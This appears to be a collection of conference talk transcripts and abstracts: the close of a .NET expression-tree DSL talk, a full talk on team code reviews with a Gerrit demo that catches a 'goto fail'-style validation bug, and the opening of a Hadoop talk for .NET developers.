attribute now, and it is in a validation attribute, and I client, I have no idea how to pronounce that, so I'm not going to try. But it takes a rule source. That's going to be the sort of weird expression thing that I'm giving it in. And then it parses that and creates a console. A console is just going to be a reference to that abstract syntax tree that I talked about. And when you sort of, when it's time to do the validation on the server side, it's going to create a validator, and then just going to call that validator directly. If it's okay, then it's okay, otherwise it's going to return a fault. And there are similar things for the client side bit. The output then is a little bit different. So you sort of traverse the same AST, but then you produce some JSON and send that to the browser. And of course, I showed you some really simple examples earlier on. Here things are a little bit more complex because we're just doing more stuff. But the principles are pretty much the same. So we still have something that builds an expression tree, and then you can recognize that it has some of these methods, and now I can see why the reverse thing failed earlier, because it's not here. But yeah, so you do a lot of things just to build this expression tree that you can compile. So at this point, I think I'm just going to skip to the last demos. Maybe you guys are ready for coffee now. I am. Let's do something. Hopefully, you've seen that there is some value to this, right? This is kind of powerful. This last thing I'm going to show you is even more powerful, but it's less useful. It's just for fun. The thing is that I implemented something called eval for the DSL. So this means that I can evaluate these things sort of in the runtime itself. So again, it's easier to show you. So now the rule is I'm going to pick out that thing and apply that as a rule to this. You can see that if I had shown you this. 
So it says eval rule, and this says that I'm going to take whatever you have in the rule field, and that's going to be my rule. So now the rule is it should be less than 10. And if I say 15, it's not less than 10, right? 10 is less than 10. Now, similarly, I can say it's going to be earlier than now. So let's have something that's not earlier than now. Right? Is there anything else I can do? Well, I don't know. Sorry? Oh, less than now, and you just put in something. Well, it's probably going to break. I'm not sure. Well, actually, it works. Well, it's a little bit brittle. So that's one thing. So I promised you some turtles to finish it off. Let's see. Turtle. So I have a turtle here. This is a little bit weird. This says that the me property is going to take whatever itself is and apply that to itself as a rule. And the two properties going to do exactly the same thing. And that doesn't make much sense. I suppose. But let's just try to see what that would be. It should be. Now this says that, OK, the rule is that the length of this string should be less than 10. But this text is not less than 10. Right? But it is less than 15. That works. And of course, you can do exactly the same thing over here. What sort of interesting things happen if you do this, right? Because now I'm sort of taking this string. And that says that I'm going to take this string and apply that to me. Does that make sense? What happens if you put eval me and eval into? Let's try that. Eval me. That was the evil knocking lamp. Yeah, exactly. Yes. Right, so I sort of predicted that. And you can have the same thing. But you can always shortcut it like this. Right? And then everything is good. Whenever people ask me to do something else and I've prepared, I'm terrified. Right? Well, I suppose that's the way it should be, right? Yeah. OK, so basically, I think that's all I got. I could just... Yeah, there are two things that I wanted to talk about. So first thing is that if you want to read a little bit more about this thing, it's on my blog. The code is out there. It's experimental code. But it's also available as a new get package if you find that this is exactly what your business needs. And then finally, there are these cards out there. So it would be really nice if you could all just put a green card when you leave. Unless I suck, then you put a red card. And if I bore to you, you put a yellow card. And that's it. Yep, that's all I got.
|
If the world of fantasy has taught us anything, it is that the oldest magic is the most powerful magic. In the realm of computing, no magic is more ancient than the one that arises from the duality of code and data. The ability to treat code as data and data as code is at the core of LISPs legendary meta-programming capabilities, but the idea is even older than that - it echoes the spectre of von Neumann himself! With expression trees, the enabling technology behind LINQ and the dynamic language runtime, .NET programmers have access to a beautiful programming model to control this ancient magic. In this demo-driven session, we will start with some simple examples to explain the basics of working with expression trees. However, we will quickly progress to something more useful and powerful, as we consider how to build a DSL for expressing rules to be compiled and evaluated at runtime. We will end up with a complete real-world example using data validation in an ASP.NET MVC application that would be infeasible without the capabilities offered by expression trees.
|
10.5446/50802 (DOI)
|
So, I'm just going to start, because I have a lot of material to go through and maybe, almost certainly, one hour is not enough. So cancel all your plans. Now, I'm just kidding. Actually this will be a pretty light talk. So, hi everyone, and thank you for coming out to this session at this late hour of the day. I know that you've been going to sessions all day and you're probably pretty tired. I understand that. So this talk is not going to be very technically focused. It's going to be a people talk about code reviews. Okay? So just relax and enjoy. My name is Enrico Campidoglio. I work at a company called tretton37, which is the Swedish word for thirteen. So 13, 37. For those of you, yes, I see some people nodding. For you geeks out there, you know that 1337 spells leet. So I work mainly in two roles. 80% of my time is spent working as a programmer, and 20% of the time is spent being a consultant. Okay? But I'm mostly a programmer, I would say. And today, I'd like to talk to you about code reviews. Not the code review you might think of. Not the code review where you, as a consultant, are asked by a company to please come in and look at all their code and make a review. That's not the code review I'm talking about. I'm talking about the code reviews you do daily with your team members. Okay? Because why not? So, code reviews. Or as I like to say: you want to merge? Let's talk about it. Okay? Not so fast, cowboy. And we're going to talk about two things, or two kinds of aspects related to code reviews. The first one, for all of you agile people, you immediately recognize this: individuals and interactions. And we are going to talk about processes and tools. Or, in more common language, human stuff and machine stuff. Because code reviews are mostly about people, but there are also some tools involved. Okay? So that's what we're going to talk about. Next, let me ask you: how many of you are doing code reviews with your team members on a regular basis? Okay. So that's about, I would say, 40%. And now keep your hand up if you're doing it daily or on every commit. So that's about the same. That was 30%, 35. Okay, let's say 32. Is that enough? Yeah. So 30% of you are doing it on a daily basis. The rest of you, I'm guessing, are not doing that. So why not? Why are you guys not doing code reviews? You know, in the publishing industry, no written word ever sees the light of day until it has been reviewed by at least a dozen people who are experts in the field the book or article is about. Some people even have their blog posts reviewed by others before they publish them, because they are afraid of the bashing, you know, just double-checking. So if we're doing this with the written word, and code is written word, why are we not reviewing our code? Why are we just pushing and merging happily every day? I have a theory about that. There are a few problems with code reviews. And as with most human things, it's hard to just point out what the problem is until it hits you in the face. Okay? So let's try that. Let's try to pinpoint what the problem is. The first problem I see with code reviews is ego. Now, we all know about ego. Programmers are a proud bunch. And code reviews sometimes just rub programmers the wrong way. But we all know that ego is inversely proportional to the amount of knowledge you have. If you think about it: the less the knowledge, the greater the ego; the greater the knowledge, the lesser the ego. So that's one aspect of it.
And there is something we can do about it, which we'll talk about later. So ego. The other thing is some programmers tend to identify themselves with the code they write. As if the code they write is an extension of themselves, it's their essence. Now, that makes me think a little bit. Because think about, if you look at the code that you wrote, say, five years ago, chances are you're going to look at the code you wrote five years ago and think, whoa. Thank God I don't write that code anymore. But does that mean that five years ago you were a bad programmer? I'm sure you weren't. Because at that time, you did your best possible job with the amount of knowledge you had, whatever the state of the industry was, whatever the trends were, you did your best. So you weren't a bad programmer five years ago, even though now you look at that code and you think it's crap. But it was you who wrote it. And by the same token, the code you wrote today, if you look at it in five years, you're going to think, oh, man, I was walking around holding monkeys by hand. So you are not your code. The third aspect is fear of mistakes. There is this fear of, gosh, I don't want my colleagues to see that I made this awful mistake because they're going to laugh at me and they're going to lose respect they have for me and all those things. So that's another thing that's kind of those three things, ego, identifying yourself with your code and fears of mistakes. Those are three people aspect that are kind of blockers for code reviews. So just don't do that. There is another aspect. And that's called the culture. The culture of your company, the culture of your team, or lack of culture. Because sometimes programmers, when they do code reviews, they tend to get personal, okay? And speak in absolute. This is wrong. This way of doing this thing is wrong. Let me tell you how to do it instead. And that taps on the ego, which creates conflicts. So one thing to remember when we do code reviews is that do not review the person, review the code. Those two are separate things. And do not speak in absolute. Only fools speak in absolute. Which in itself is an absolute. Okay? So those are, let's say, the people things. There is another aspect. And it's time. Now code reviews take time. And we can't escape from that fact. So this is how productivity looks like for a programmer in your average day. You see those dips? Those are the points in time when someone taps on your shoulder and asks you a question or asks you to do a code review. And those peaks, you see, they are late at night. That's when everybody is sleeping. So programmers work best when they don't have interruptions. Because then they get into the flow and they stay in the flow and they stay productive. If someone is coming every five minutes, hey, can you just review my code? It's boom. Suddenly you lose your flow. And it may take you half an hour to get back into it. And you have to look at someone else's code, which you really don't want to do right now. That's a problem. So all those things are problems that prevent teams from doing code reviews. Let's step back for a moment. What do you get from code reviews? Why should you even bother? Let me tell you three things that you get by having code reviews as a standard practice. First code quality goes up. And that I can tell you is really true. You can also think about it. Two pair of eyes will find more defects or more problems than one pair of eyes. 
Three pair of eyes and ten pair of eyes and 100 pair of eyes, they will find everything there is to find in that code. So code quality will go up. Also because you can enforce code conventions. Right? So code reviews give you this power. Actually, I watched that as a kid. It's called He-Man. Do anyone in the movie remember He-Man? Oh, yes. You are my people, yes. The 80s. The 80s. Good times. Then you have bugs. Okay? We talked about defects. Bugs go down. Okay? Code quality goes up. Bugs go down. And if you find a bug in a code review, it's much better than if your customers find the bug or the entire world finds the bug. Okay? So it's better to catch bugs early rather than later, especially if you are on television or on YouTube. Did CNN actually show that? I remember this is the CNN logo. That would be amazing. And then you have this aspect of as you sit with your peers and you're walking through the code and you're talking about conventions and how to do things, you share knowledge. So you share the knowledge you have about the domain or about the programming language or the framework or whatever it is, you share it into the team. Okay? So if you have someone in your team that is really expert about something, they will transfer this knowledge to other people. The hungry ones, hungry for knowledge. Okay? Code reviews are a good way to do that. So we have seen there are problems. There are people problems. There is ego. There are cultural problems. Speaking absolutes. Attacking the person instead of going after the code review. And then there is this time problem. Let's see how we can tackle that. Let's turn those things around. Okay? There is actually a way. Let's tackle this ego thing. Now if you have code reviews in place at your workplace, people will feel observed. They will feel that at some point someone else will look at their code. Therefore they will be a little bit more careful about how they write it. This is because of the big brother effect. Now it may not always be positive because it can create anxiety, but it actually improves the code quality. So just by having code reviews as a process creates this pressure on being a little bit more careful before you push that commit into the master. Okay? Big brother effect. The second thing is that code reviews trigger ambition. Why? Because you want to impress your programmer friends. Right? When you do code reviews, you want them to think that this code is awesome. You don't want to sit in a code review and people are like, yes, it works, but, you know. So it triggers this ambition that many programmers have, if not all of them have, to impress and to feel accomplished. Okay? Push their boundaries. Code reviews have that effect and they tap on the human aspects. And then when you actually do code reviews, try to be constructive. Okay? Give constructive feedback. Be nice. Those things will make code reviews easier if you just are nice to the one or the ones you're doing code reviews with. And in the end, it's important to remember this. In a project, everyone is on the same boat. You can safely assume that in a project, all team members are there to do their best because everyone wants the project to succeed and everyone wants the software to be the best possible software that can come out of that team. 
Now, this idea is very, at the very basis of the agile methodologies where you have the trust, trusting people in that people want to do their best, which was a contrast from the heavy process methodologies from the past where there were managers controlling everyone and checking their time reports. Why? Because they didn't trust that people wanted to do their best. And those methods were based on the assumption that people are slackers, so they need to be controlled and whipped, otherwise they won't work. That got completely torn on its head with agile, where you put trust into the team. The team will take responsibility and they will do their best. So let them do that. Okay? So code reviews is a tool that also ties to that. Now let's talk about time. Now we said take code reviews, they take time. And there is really much we can do about it. However, there are three kinds of code reviews you can do. Actually, there are six, but let's boil it down to three. So the first kind of code review is called the formal code review. And that's when you open up Outlook and you book a room, a meeting, you invite the people who are supposed to be in the code review, the people who wrote the code and the people who are supposed to review it. You book a projector even as a resource in Outlook. And sometimes you even book refreshments in Outlook as a resource. Then you all meet and you sit down and they all go, so, show us your code. And that's a pretty scary situation to be in. Now those guys are serious, they even have a typewriter, that means they really know their shit. Okay? So that's kind of intimidating. And very, very time consuming. However, that's the kind of code review that we'll find the most amount of defects. So that's one. The other kind of code reviews are those who are called over the shoulder code reviews. And those are slightly less formal. You don't have to book a meeting. You don't have to book a room. You basically just get up and go to one of your colleagues and ask, sorry, could you please review my code? And then what happens? You sit down at your computer, your colleagues are sitting next to you and you are walking them through your code. So I did this and I did that line. So that's okay. That works. It certainly requires less time and less planning. And you will find a okay amount of code defects. Why? Because if the person who wrote the code is the one working through the code, they will of course skip through parts of it and they will go fast and say, oh, don't look at that. It doesn't matter. So the people who are doing the core reviews, they don't have time to think by themselves about that code. They are just being hold by hand and quickly walk through the defects so that we can get along and get over with it. Okay? Now, I like in this particular picture, this guy goes, huh, for example, not one single semicolon. Okay? I hope they won't notice that. And then that guy over there who is paying attention goes, what? You're not going to merge that, son. So that's over the shoulder core reviews. The third type of core reviews, actually, they don't have a name. I called them the async core reviews because they happen asynchronously from when the code is written. And the person who wrote the code doesn't even have to be physically there when the core review is done. However, I found pretty difficult to find a way to represent a sync. How do you represent a sync? So instead, I put out a picture of M sync. So what are those async reviews? 
Those are the reviews that are done offline. If you're using GitHub and you do a pull request, that is in itself an asynchronous code review. Why? Because you just open the pull request and you go about your business. At some point in time, later, someone will look at your code, annotate it, and let you know what the problems are. So they happen temporally asynchronously. Okay? That's kind of hard to say. But it's still true. And those are very effective. Why? Let's look at it. Now, this is a very scientific measurement. It may sound like I'm pulling these numbers out of my hat, but they have actually been measured. So if you have this graph where the Y axis represents the number of defects found in a code review and the X axis is the time and effort it takes, up in the right corner we have the formal code reviews. They take the longest time, but they find the most defects. Down at the lower end, we have the over-the-shoulder reviews. They are very quick and easy, you do them all the time, but they also find the least amount of defects, for the reasons we talked about. Right in the middle, we have the async ones, or the *NSYNC ones. Okay? So I propose that the kind of code reviews that should happen in a workplace are those async code reviews. Now let me give you a demo of how such a code review could happen. Now, I'm going to be by myself, so I'm going to play two roles. But I just want to show you a tool that you can use to do this kind of code review. So now it's tool time. The best time. Now, you may use GitHub for your projects. Is anyone using GitHub for their projects? At work, not open source? Okay? One? Great. And how many of you are using GitHub? Yeah, private repos. Okay, so a few. I'm guessing you are taking advantage of the pull request model to do code reviews. How many of you are doing that? Okay, so three, four. Yeah. And not every organization wants to, or can, use GitHub for their internal projects. So there are some tools that help you do code reviews in this fashion inside the firewall, so you don't have to have your code out in some other place. And one of them is called Gerrit. Now, Gerrit is a code review tool that is a fork of another code review tool, which is a fork of another one, which was developed by Google internally. So it's closed source; it never saw the light of day. But Google is using it internally for their own development. Now, I can't remember the name of that project. Something with M. Anyway, it was tied to Perforce, because Google was using Perforce as source control. So the tool they built was tied to that. Then the creator of Python took that code, open sourced part of it, and tied it instead to Subversion. Yeah, but that made sense at that point in time. You know how the saying goes: at the time, it sounded like a good idea. Then someone else, namely the Android Open Source Project no less, those people chose Git for their source control. And they wanted to use the same tool. So what did they do? They forked it. And they tied it to Git. Now, as Git is becoming more popular every day, that's what I'm going to show you. So there are alternatives if you're using Subversion: the other tool is also open source, and it works with Subversion. This one works with Git. And it's being used by the Android Open Source Project, amongst others. So let's look at what an async code review looks like. But first let me show you this tool. So let me just mirror that. Okay. That looks strange. Let me just increase that.
So this is the Garret web, a web UI that's running on my machine. And by the way, this is Garret, the open source, it's on the web. And that's the Android open source project version of Garret. So there is a web UI where you can see incoming reviews, outgoing reviews. So there is a list of commits that are pending for review. And that's the key of the asynchronous model. As you work on your day, you don't have to get interrupted. You are in your flow. You do your work. When you feel that you have five minutes, ten minutes time, you open up a tool like that, and you look, what are the pending code reviews? And you just grab one. And you do review at your time and pace. Nobody is leading you through the code. You have time to reason about it. And you can give your feedback, and then you go on. So you see the advantages of it. No one is interrupted. Still communication happens. So now I'm going to pretend that I'm a programmer, well, actually I'm a programmer. So I'm going to pretend that I'm in a project. And don't be scared by the black. It will soon turn light. So I'm in a project, and I'm using Git. So I am in a branch called demo. And I have a source file. It's called credentials.cs. Can you all guys read that font? It's okay, also in the back? Great. So this is a C sharp class. It doesn't really matter what the language is. I'm going to make a change to this class. It represents credentials. And I have a task that requires me to implement password validation. So that's how I write that code. And now don't remember no judging. Don't judge my code just yet. So this is how I whip together this code. And I'm ready to save it. So I made a change. You see on the left there are some new lines over there. Now I do the usual Git dance. So if I say cm is just an alias for commit-m, I sit a lot in the command line so I don't really write commit-m. So I just make aliases. So let's say add password validation. So I'm going to commit that. And now in my demo branch, I have a new commit which is not being pushed yet. Now the remote or the original Git repo is being hosted by Garrett. So in order for this to work, you need to let Garrett have the keys to your Git repo. So if you have a Git repo that's sitting on your local network, you have Garrett sitting in front of it and catch all the commits that come in. Okay? Let me just show you. Also to verify that it is really up. Oh! Remote show origin. Yes, so you see the remote is sitting on my local, so.local, listening on port 8080, and that's exactly the same which is over here. Okay? Yeah. Okay. So let's go back to it. So how do I... Now I want to... Someone has to look at this code. I don't want to just merge it and push it and be done with. I need someone else to look at it. What do I do? So if I sit in the command line, I could just write Git review. Now I know this looks like total magic, but I'm going to really show you what Git review does. So review is an alias, of course, like everything else. It's an alias for what, you might ask. It's an alias for this. You say push to origin, but you don't push to the same branch where you're working in. You're not even, for God's sake, pushing to master. You are pushing to a different branch that does not yet exist. And it is called for. That's the namespace of the branch. And master. Now this for master is a Garrett convention, which means that commit, I would like it to merge it to master. Just like when you do a pull request, you say, what do you want to merge it to? That is the Garrett convention. 
If you say for, slash, and the name of a branch, that will be interpreted by Gerrit as: okay, you want to merge this to master, but you need a code review first. So instead of typing out that whole push origin thing, you can just set up an alias and say git review instead. So now this has been pushed to Gerrit's version of the Git repo, into that branch. And now I'm off to do other things. I have no worries. Someone else, some poor, poor guy, is going to look at it, you know, when they have a coffee break and feel like doing a code review. So they go into Gerrit and they see... now, this shows up as outgoing because it's the same account that made it; it should show up as incoming, but I'm using the same account, okay? So this is both me and the person reviewing. So there is an incoming review by me. I want to merge into master, okay? Let's open it up. Whoa, I know, I know. Gerrit looks like crap, because programmers are not designers, and you know the story. However, it reminds you an awful lot of Gmail. Why? Because the people who made the original project were originally people who worked at Google. So if you need shortcuts, you can just press the question mark and you get a very Gmail-like experience. So this corresponds to your pull request page. However, there is actually more here. Let's take a look. First, it says it needs a code review. I have a chance to review; here I have the diff over here. If I open it up, I can even review the commit message, okay? Like, I could say, oh, that message is not clear enough. But in this case, I'm going to say, you know, this message is good enough. So you just hit the shortcut and move to the next diff, okay? And it shows you the next file in your commit, and you are ready to review. So you see I added this with some white space. That's already a point of review. So I'm going to make a comment and say, dude, what's with the white space? I hate that. And you just type it in. Now, this reminds you an awful lot of the GitHub pull request. You can annotate on the lines. Works really well. Then I go into the method itself; I'm done picking the low-hanging fruit. Now let's actually look at this code. Now, for the people who are awake among you: maybe you recognize this bug. I'll give you a couple of minutes. Yes, sir. This is the goto fail bug, or the C# version of it. Now, a few months ago, Apple was involved in a little scandal regarding the security of their SSL implementation on iOS. Does anyone recall that? A few. Okay, for those of you who don't remember it or don't know about it: Apple had a security hole in the SSL implementation which was on everyone's iPhones and iPads, and which basically allowed you to bypass the verification of who the server is. Part of SSL is to check that the server really is what it says it is. There was a bug that allowed some code to bypass that, and that way you could have a server that said ebay.com with SSL but in reality was a completely different server, taking all your inputs. Now, the bug turned out to be exactly this, or a version of it; that code was written in C. This code is written in C#, but it's basically the same bug. Now, do you see it? What happens if I send in a password that has the required length? Well, it will set valid to true, right? And if it doesn't have the required length, it will return false; that line is only supposed to run when the check fails. However, since I don't have braces, the next line will always be executed.
Because if you don't put braces on the if, it's only the first line after the if that's being selected. The next line, it's not part of the if. It's always there. So this way you can completely bypass the validation which happens afterwards. So what happens? I send in a password that only has the required length. This will be set to true. This will not run because it only runs when it's false. However, when I come to this line, it's going to say return true. So this is the SSL bug. And unbelievable, someone just made it in C sharp. So I'm going to say, whoa, whoa. What happens if the password has the required length? So I made another comment. So I'm done reviewing this file. They completely on my own. And now I'm ready to publish those. So you see I've draft, I have two comments that are not yet published. And the review is still pending. So now I'm ready to say, you see Garrett gives you a score. Plus one means it looks good to me, but I need someone else's opinion. So this is more advanced than the pending than the pull requests. This is a little bit of a workflow I built in. So you can ask for another pair of eyes, or you can just say, looks good to me, approved. Or you can say, you know, this works, but you're not following the conventions. And then like in this case, no way. This cannot be, this shall not pass. And you say post. Done. Now I am back to the programmer, and I look at Garrett, or actually you can type it to email, and I see that, whoa, rejected. What happened? Okay. Of course you can imagine that it will appear in another one. Then I open it up. And I look at the files and I see, okay, there are two comments over here. Let me open it up. You see Enrico made those. Let me open it. Oh, you're right. You're right. I totally see that, okay. So you can also reply and say, sorry, man, I didn't read the news. Okay. So the same idea. You can have a conversation here with comments, and you can also publish the comments. So you can have a conversation ongoing. Notice also this. If in the meantime something happens in the branch, I can always cherry pick it into another branch. So since Garrett is tied up to Git, it can take advantage of the things that Git has, for example, you can decide that, you know, I want to take that commit and take it into another branch of mine for code and for review, and you can just do that from the web UI. At the same time, if a new commit had happened, you will have a new button here that says rebase. You can keep up with what's happening in the branch as the review can take a few days or the time it needs. So it's a little bit more involved. And you can add more reviewers and so on and so forth. So it's a little bit richer than the pull request. So what happens now that I want to patch that? I want to fix the problem. Now let me go back to my file and let's fix it. Let's fix it really quick. Let's just remove the duplicate return. Now you may have opinions about how the code actually looks. This is not really what I would call idiomatic C sharp. But for the sake of this demo, let's just keep it the way it is. Also I had a, you see here this white space? I had a comment on that. So let's just empty that. So now I don't have it. Let me save it. So I removed the white space and I fixed the bug. So now how do I push this commit? So I made, of course, a change. If you've been a servant before, you may notice that when I pushed my previous commit, this happened. 
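The demo code itself isn't in the transcript, so here is a hedged reconstruction of the shape of the bug (class and member names are approximate, the required length is illustrative); the second return is indented as if it were guarded by the if, but without braces it always runs, so everything below it is skipped. The fix in the demo is simply to delete that duplicated, unguarded return (and, ideally, to add the braces).

public class Credentials
{
    private const int RequiredLength = 10;   // illustrative value

    public bool HasValidPassword(string password)
    {
        var valid = password.Length >= RequiredLength;
        if (!valid)
            return false;
            return true;   // not part of the if: it runs whenever the length check passes,
                           // so every further validation rule below is silently bypassed
        // ...the remaining password checks are unreachable...
    }
}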
Now, this is a piece of metadata that Gerrit appends to all commits, and it's what it uses to track different commits that are part of the same code review. A code review gets feedback, we address it and make a new commit, but those commits are still part of the same review process; you don't want new reviews to pop up. And that ID is what Gerrit uses to track that. So as long as your commits have the same ID, they will be treated as the same code review issue. The easiest way to do that is to just stage the change and amend: redo the latest commit, with the same ID but a different diff. And then I just say git review again. You see this time it says updated changes, and this is the unique URL for that review. So now let's go back to our code review. Now I see that a new commit has been made, right about now, as part of the same review process. And if I look at the two files, let's say this one is good. Let's look at that one. Now it looks better, okay? The problems have been addressed. You see the comments are gone, because this is a new diff. I'm going to say: this looks good to me. Now, this Verified flag is an extra thing. You may not want to use it, but you could have, for example, an extra check that says this code passes all the tests and the quality gates. So not only can it be good by review, you may also need to verify that it works in the test environment or whatever. And you can have an external build tool like Jenkins or TeamCity do that, because Gerrit has a REST API. So you can have TeamCity, for example, run the build, and if it passes, automatically set the Verified flag. Good enterprise stuff. Enterprise. So now that it has passed, it's ready to be submitted. And this is cool, because now I can simply say submit, boom, merged. See here? Now this has been merged into the branch where it was supposed to be merged, in this case master. So the person who wrote the code doesn't have to also receive the feedback and say, okay, now it's okay, I'll push it. You can push it directly from Gerrit. So if I go back to my workstation and I go to master, I can simply say git pull and I get my new commit, because it got merged. Good? So this was a brief demo of how you could carry out these code reviews inside the organization without necessarily having to use GitHub or similar tools. You can simply use a tool like Gerrit if you're using Git, or other tools if you're using, for example, Subversion, to do this kind of asynchronous code review inside your team. You've seen that things happen at their own pace and time, they don't disturb anyone, and still a conversation happens. By the way, this is also good if you are a distributed team, where people are physically in different parts of the world and it's very hard to have a natural meeting, even over Skype. This works really well for distributed teams. So let me leave you, because we are actually almost done already, which is good, so you can grab a coffee before everyone else, with three concrete tips that you can apply when you do your code reviews. How many times have I said code reviews? Did anyone keep count? I'm guessing about 50. How many times can you really say it before it becomes noise? So the first one is: review small portions of code at a time. But that also implies that the commits are small.
Of course, if you are getting, like I've unfortunately seen, commits that consist of 130 files where the comment is "many changes", that doesn't help anyone. It doesn't help the reviewers, it doesn't help the people who are going to merge it, it doesn't help anyone. So keep your commits small and focused: one commit, one logical change. That will make it easier to review as a single unit, like in this case. So, review small portions of code at a time. The second tip I have for you is to keep a checklist. You can find those online for every language on the planet, because some of those bullet points are specific to the language you're using. For example, for C# or for .NET, you will have points like check for throwing argument exceptions, or check for null reference exceptions, or make sure the braces are in the right place. That's for C#. Now of course, if it's JavaScript, that list is empty. Sorry. The third tip I have for you is: when you do a code review, keep it under one hour. Why? It may sound like an arbitrary number, but the human mind works best when you focus on a task for at most an hour, because after one hour, if you keep staring at that code, you won't see anything. It will be just blah. So one hour max, and then leave it and come back to it later, which is easier if you are doing the kind of code reviews that I showed you; you don't have anyone sitting next to you waiting. So keep those under one hour and you will be fine. With that, I would like to say thank you for your attention. And we have a good 20 minutes for questions; if you have any, I'll take them now. Yes? So the question is: if you do architecture reviews or design reviews, can they also be done this way? Yes, if you have a shared artifact that you are looking at, something that represents what you are talking about, because you kind of need one; this is based on files, basically, diffs of files. So if you have some kind of document that is being worked on, which may be the architecture or the guidelines, then yes. But that's another thing: if you are thinking about the whiteboard session where everybody is throwing around ideas and brainstorming, that must of course be done in person. This is about reviewing documents, or reviewing text that evolves over time. So you mean if you have different artifacts? Not every single comment, but after several comments you will have, maybe, some artifact. Okay, so you mean if one code review explodes into a deeper discussion of the architecture of the system, which can happen; programmers being programmers, that back and forth can go on forever, and it happens in GitHub too. At that point, a tool doesn't help you. You actually need to talk to the human beings. These tools work, but they don't scale to infinity, so at some point with those discussions, yeah, we are dealing with people. Which is kind of ironic: many people say, hey, I became a programmer because I didn't want to deal with people, only with computers, and then they find out that programming is all about dealing with people. Okay. Yes, more questions? Yes? So the question is: what if I make a change and I want it reviewed before I go on building on top of that change? And you want to submit small changes? Yes. But you can't really submit it until it's reviewed, right? Okay, because I need to build on top of that afterwards. So the question is: I make a few changes.
I make small commits, and now I want someone to review them before I push, because I need some other work to happen, or someone else in the team needs those changes in order to build on top of them. And does a tool help with that, is that the question? Just how you deal with that? Yes. Yes. Exactly. In the async (or "N Sync", depending on your musical preferences) world, a tool like Gerrit supports the concept of a blocking code review. So one code review comes in, another change comes in and says, I need that code review to pass before this one passes. There is the concept of depends-on, or blocks. And you will see those on the same review page: you will see that this code review is blocking those two. If you've looked at the Android project, the whole list was full of code reviews with dependencies. So the people who are reviewing will of course have to prioritize the ones that others are waiting on. So yes, that is built into the tools, absolutely. I think in practice what I see happen is that you keep working, and then the next version of the code review has the fixes from the last one plus lots of new changes. So yes. The question is, sometimes it takes too long and people just carry on without waiting for the feedback, and that's the human aspect of it, of course. The fact that these reviews can happen asynchronously doesn't mean that you can wait weeks before reviewing. If the code base is changing quickly and code reviews need to happen, for the reasons we explained, like code quality and knowledge sharing, then you need to prioritize them as part of your day. Like: you check email, you check Twitter, you do a code review, you check Twitter, you do a code review, you work, you get a coffee, you check Twitter, and then you do another code review. You have to find a workflow that works for you during the day, right? It's not that just because you have a tool, it automatically works itself out. You need a process. I hate to say process. You need some kind of discipline, of course. The tool just helps you not interrupt anyone, and gives the reviewer time to think by themselves, instead of having someone sitting there pointing at the screen saying look at this and look at that. So that's what the tool helps with. Any other questions? Yes? Yes, you. Oh, sorry, you were aligned. You raised your hands at exactly the same time and one of you had a higher z-index, so I didn't see you. Sorry. You first. Yes. So, in your opinion, does the code review tend to become a bottleneck, and how much of your time is spent on code reviews? Yeah. So the question is: how much time do you spend on code reviews, and does it become a bottleneck? If you keep the changes small, the code reviews will be quick. They may even take a couple of minutes. Small diff, yes, looks good, go on. On the other hand, if the changes are big, then they become cumbersome, but that's something you can address. You just agree on your team: make small changes, make small commits, and then you just process them at some point. Of course, you need to pay attention, not just say okay, okay, okay, just to get rid of them. Of course, you need to look a little bit. But if diffs are small, it takes no time. And another thing: if you have this process in place where people are constantly reviewing each other's code, constantly doing that, they will create synergy.
So the longer you do it, the better the team members are in sync with each other, because they've been looking at each other's code. And they talk about things that maybe one person does differently from another programmer: why do you do it that way, I like to do it this way. They talk about those issues, and then they agree upon a convention. So the longer you have this in place, the more synergy there is in the group, and the fewer issues you will find in code reviews, because the code will start to look homogeneous. It will follow the conventions. Another good side effect is spreading knowledge, not only of the language or the framework, but also of the different parts of the system. Something I see very often, especially on large projects, is this: a bug report comes in, it's in module foo, and everybody goes, oh, that's not me, I didn't write that module, I have no idea how it works because I only worked on module bar. And that happens all the time. If you have people reviewing each other's code, they will know how the different parts of the system are written, so they have a chance to go in and fix it. You don't get that "oh, not me, sorry, I'm going home". They can go into each other's code and fix it, because they've seen it before; they've kept up with the development of it. So that's another good side effect. I don't know if that answers the question. Does that answer the question? Yeah, yeah. It's hard to measure, like, weekly, but the code reviews that I do take from 30 seconds up to, for the longest ones, something like 20 or 25 minutes. Then I get tired or I get bored and I do something else. But with a tool like that, I can just go off and do something else and come back to reviewing, and pick up where I left off. So, was there another question at the back? No? Maybe I answered too much. Are there any other questions? If you think of questions later or you want to discuss this with me, just ping me on Twitter or find me at the venue. Thank you very much.
|
It's undisputed that regular peer reviews are one of the most effective ways to maintain high quality in a code base. Yet so many development teams choose not to adopt them for their software projects. In the publishing industry, no written word ever sees the light of day before it has gone through an extensive period of critical review. This applies to books, scientific papers and newspaper articles alike. Why not software? In this session we'll explore the social and practical reasons why code reviews aren't as widely adopted in modern software development shops as they should be. We'll also look at a few concrete tools and techniques that teams can put in place to help them overcome the most common roadblocks. In the end, we'll see how code reviews help peers leverage each other's knowledge and skills to ensure their work is as good as it can possibly be.
|
10.5446/50803 (DOI)
|
Okay, can everybody hear me all right? Yep, excellent. All right, we'll crack on because we've got a lot to cover in this hour, so we'll get started. So this is me. My name's Gary Short. I'm an MVP, C-Sharp MVP, freelance data scientist. I specialize really in big data architecture and engineering, using all that cool stuff there. Data scientist, it covers a kind of broad church or a wide variety of sins, as we like to say, but mainly I specialize in predictive analytics and computational linguistics. The most important thing about that slide really is the part at the bottom there where you can see my contact details. If you've got any questions after the talk or you want to chat to me about anything, then please feel free to reach out to me. So what we're going to cover in the next hour briefly is this is a kickstarter on getting Microsoft developers, particularly.NET developers really, up and running on Hadoop as quickly as we can. So what we're going to cover in this next hour is what problem does Hadoop solve? We're just going to quickly demonstrate the actual problem that it solves so that we can kind of set a frame of reference. We'll talk about how we can install it on your local dev machine, how to get your C-Sharp code running on it. Now I see C-Sharp code there. Actually you can set at that point your favorite.NET language, whatever that may be. So if it's VB, if it's F-Sharp, whatever you use, it's all the same. These examples will be in C-Sharp, but other than that, you can use any language that you like really. We'll talk a little bit about how I'll give you a brief demonstration of how to visualize your results, because that's really important as well. And then at the end, we'll talk a bit about how you instrument your code once it's up and running in Hadoop. How do you see what it's actually doing? You don't want it really to be a fire and forget. And then at the end, I say at the end, think about questions. It's got to take up some position in the agenda, so I put it at the end. But actually, if you've got any questions as we're going through, just ask them. It's always easier for me as a presenter to answer questions that you've got at the time, instead of having to go back in my talk, mainly because I'm a bear of a little brain, and I'll probably have forgotten what it was I was talking about by the time we get to the end, and you actually ask your question. Okay, so what we want to do now is I want to give you a quick demonstration then of what problem Hadoop solves. So we're going to come out of the slides there for a second. And I'll go up down 